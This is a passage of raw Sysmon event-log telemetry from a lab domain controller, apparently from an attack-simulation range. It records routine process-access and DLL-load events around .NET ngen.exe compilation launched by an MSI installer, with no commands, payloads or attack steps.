14:57:23.436{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-740C-00000000BB01}6360c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.421{A7A01FEF-EBD3-607E-740C-00000000BB01}6360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.405{A7A01FEF-EBD3-607E-750C-00000000BB01}26005600C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-740C-00000000BB01}6360c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.405{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-750C-00000000BB01}2600C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.405{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-740C-00000000BB01}6360c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.405{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-740C-00000000BB01}6360c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.389{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-720C-00000000BB01}3960c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.389{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-720C-00000000BB01}3960c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.389{A7A01FEF-EBD3-607E-720C-00000000BB01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.374{A7A01FEF-EBD3-607E-730C-00000000BB01}55364820C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-720C-00000000BB01}3960c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.358{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-730C-00000000BB01}5536C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.358{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-720C-00000000BB01}3960c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.358{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-720C-00000000BB01}3960c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.343{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-700C-00000000BB01}5444c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.343{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-700C-00000000BB01}5444c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.343{A7A01FEF-EBD3-607E-700C-00000000BB01}5444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.327{A7A01FEF-EBD3-607E-710C-00000000BB01}49726748C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-700C-00000000BB01}5444c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.311{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-710C-00000000BB01}4972C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.311{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-700C-00000000BB01}5444c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.311{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-700C-00000000BB01}5444c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.311{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-6E0C-00000000BB01}4532c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.311{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-6E0C-00000000BB01}4532c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.311{A7A01FEF-EBD3-607E-6E0C-00000000BB01}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.280{A7A01FEF-EBD3-607E-6F0C-00000000BB01}11126076C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-6E0C-00000000BB01}4532c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.280{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-6F0C-00000000BB01}1112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.264{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-6E0C-00000000BB01}4532c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.264{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-6E0C-00000000BB01}4532c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.264{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-6C0C-00000000BB01}3712c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.264{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-6C0C-00000000BB01}3712c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.264{A7A01FEF-EBD3-607E-6C0C-00000000BB01}3712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.233{A7A01FEF-EBD3-607E-6D0C-00000000BB01}11564360C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-6C0C-00000000BB01}3712c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.233{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-6D0C-00000000BB01}1156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.233{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-6C0C-00000000BB01}3712c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 